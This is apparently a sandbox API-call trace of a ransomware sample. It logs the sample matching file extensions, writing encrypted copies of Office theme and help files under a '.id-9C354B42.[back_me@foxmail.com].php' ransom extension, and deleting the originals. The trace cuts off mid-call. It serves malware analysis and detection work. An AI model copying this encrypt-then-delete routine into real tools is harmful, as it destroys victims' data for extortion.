lstrlenW (lpString=".bz2") returned 4 [0048.154] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.154] lstrlenW (lpString=".7z") returned 3 [0048.154] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0048.154] lstrlenW (lpString=".dbf") returned 4 [0048.154] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0048.154] lstrlenW (lpString=".1cd") returned 4 [0048.154] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0048.154] lstrlenW (lpString=".jpg") returned 4 [0048.154] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.155] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=53115) returned 1 [0048.155] CloseHandle (hObject=0x1b0) returned 1 [0048.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 0x20 [0048.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.156] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.156] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.156] GetLastError () returned 0x0 [0048.156] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xcf7b, lpOverlapped=0x0) returned 1 [0048.439] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xcf80, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xcf80, lpOverlapped=0x0) returned 1 [0048.443] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.443] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.443] SetEndOfFile (hFile=0x214) returned 1 [0048.443] CloseHandle (hObject=0x214) returned 1 [0048.443] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.443] SetEndOfFile (hFile=0x1b0) returned 1 [0048.445] CloseHandle (hObject=0x1b0) returned 1 [0048.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.445] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1 [0048.445] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.445] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.445] lstrlenW (lpString=".doc") returned 4 [0048.445] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.445] lstrlenW (lpString=".docx") returned 5 [0048.445] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.445] lstrlenW (lpString=".pdf") returned 4 [0048.445] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.445] lstrlenW (lpString=".xls") returned 4 [0048.445] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.445] lstrlenW (lpString=".xlsx") returned 5 [0048.445] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.445] lstrlenW (lpString=".ppt") returned 4 [0048.445] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.445] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.446] lstrlenW (lpString=".zip") returned 4 [0048.446] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.446] lstrlenW (lpString=".rar") returned 4 [0048.446] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.446] lstrlenW (lpString=".bz2") returned 4 [0048.446] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.446] lstrlenW (lpString=".7z") returned 3 [0048.446] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.446] lstrlenW (lpString=".dbf") returned 4 [0048.446] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.446] lstrlenW (lpString=".1cd") returned 4 [0048.446] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.446] lstrlenW (lpString=".jpg") returned 4 [0048.446] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.041] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=29305) returned 1 [0049.041] CloseHandle (hObject=0x208) returned 1 [0049.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 0x20 [0049.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.042] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.042] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.042] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.042] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0049.042] GetLastError () returned 0x0 [0049.042] ReadFile (in: hFile=0x208, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x7279, lpOverlapped=0x0) returned 1 [0049.044] WriteFile (in: hFile=0x184, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x7280, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x7280, lpOverlapped=0x0) returned 1 [0049.046] ReadFile (in: hFile=0x208, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.046] WriteFile (in: hFile=0x184, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.046] SetEndOfFile (hFile=0x184) returned 1 [0049.046] CloseHandle (hObject=0x184) returned 1 [0049.046] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.046] SetEndOfFile (hFile=0x208) returned 1 [0049.047] CloseHandle (hObject=0x208) returned 1 [0049.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.047] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1 [0049.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0049.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0049.048] lstrlenW (lpString=".doc") returned 4 [0049.048] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.048] lstrlenW (lpString=".docx") returned 5 [0049.048] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.048] lstrlenW (lpString=".pdf") returned 4 [0049.048] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.048] lstrlenW (lpString=".xls") returned 4 [0049.048] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.048] lstrlenW (lpString=".xlsx") returned 5 [0049.048] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.048] lstrlenW (lpString=".ppt") returned 4 [0049.048] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0049.048] lstrlenW (lpString=".zip") returned 4 [0049.048] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.048] lstrlenW (lpString=".rar") returned 4 [0049.048] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.048] lstrlenW (lpString=".bz2") returned 4 [0049.048] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.048] lstrlenW (lpString=".7z") returned 3 [0049.048] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0049.048] lstrlenW (lpString=".dbf") returned 4 [0049.048] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0049.048] lstrlenW (lpString=".1cd") returned 4 [0049.048] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0049.049] lstrlenW (lpString=".jpg") returned 4 [0049.049] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.316] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=44302) returned 1 [0049.316] CloseHandle (hObject=0x1e8) returned 1 [0049.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 0x20 [0049.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0049.316] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.316] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.317] GetLastError () returned 0x0 [0049.317] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xad0e, lpOverlapped=0x0) returned 1 [0049.319] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xad10, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xad10, lpOverlapped=0x0) returned 1 [0049.320] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.320] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.321] SetEndOfFile (hFile=0x20c) returned 1 [0049.321] CloseHandle (hObject=0x20c) returned 1 [0049.321] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.321] SetEndOfFile (hFile=0x1e8) returned 1 [0049.322] CloseHandle (hObject=0x1e8) returned 1 [0049.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.322] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1 [0049.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.322] lstrlenW (lpString=".doc") returned 4 [0049.322] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.322] lstrlenW (lpString=".docx") returned 5 [0049.322] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.322] lstrlenW (lpString=".pdf") returned 4 [0049.322] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.323] lstrlenW (lpString=".xls") returned 4 [0049.323] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.323] lstrlenW (lpString=".xlsx") returned 5 [0049.323] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.323] lstrlenW (lpString=".ppt") returned 4 [0049.323] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.323] lstrlenW (lpString=".zip") returned 4 [0049.323] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.323] lstrlenW (lpString=".rar") returned 4 [0049.323] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.323] lstrlenW (lpString=".bz2") returned 4 [0049.323] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.323] lstrlenW (lpString=".7z") returned 3 [0049.323] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.323] lstrlenW (lpString=".dbf") returned 4 [0049.323] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.323] lstrlenW (lpString=".1cd") returned 4 [0049.323] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0049.323] lstrlenW (lpString=".jpg") returned 4 [0049.323] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.324] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.324] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.324] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.325] GetLastError () returned 0x0 [0049.325] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1195f, lpOverlapped=0x0) returned 1 [0049.327] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x11960, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x11960, lpOverlapped=0x0) returned 1 [0049.329] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.330] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.330] SetEndOfFile (hFile=0x20c) returned 1 [0049.330] CloseHandle (hObject=0x20c) returned 1 [0049.330] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.330] SetEndOfFile (hFile=0x1e8) returned 1 [0049.331] CloseHandle (hObject=0x1e8) returned 1 [0049.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.332] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 1 [0049.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.332] lstrlenW (lpString=".doc") returned 4 [0049.332] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.332] lstrlenW (lpString=".docx") returned 5 [0049.332] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1 [0049.332] lstrlenW (lpString=".pdf") returned 4 [0049.332] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.332] lstrlenW (lpString=".xls") returned 4 [0049.332] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.332] lstrlenW (lpString=".xlsx") returned 5 [0049.332] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0049.332] lstrlenW (lpString=".ppt") returned 4 [0049.332] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.332] lstrlenW (lpString=".zip") returned 4 [0049.332] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.332] lstrlenW (lpString=".rar") returned 4 [0049.332] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.332] lstrlenW (lpString=".bz2") returned 4 [0049.333] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.333] lstrlenW (lpString=".7z") returned 3 [0049.333] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.333] lstrlenW (lpString=".dbf") returned 4 [0049.333] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.333] lstrlenW (lpString=".1cd") returned 4 [0049.333] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.333] lstrlenW (lpString=".jpg") returned 4 [0049.333] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.333] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=58026) returned 1 [0049.333] CloseHandle (hObject=0x1e8) returned 1 [0049.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 0x20 [0049.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0049.334] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.334] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.334] GetLastError () returned 0x0 [0049.334] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xe2aa, lpOverlapped=0x0) returned 1 [0049.336] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe2b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, 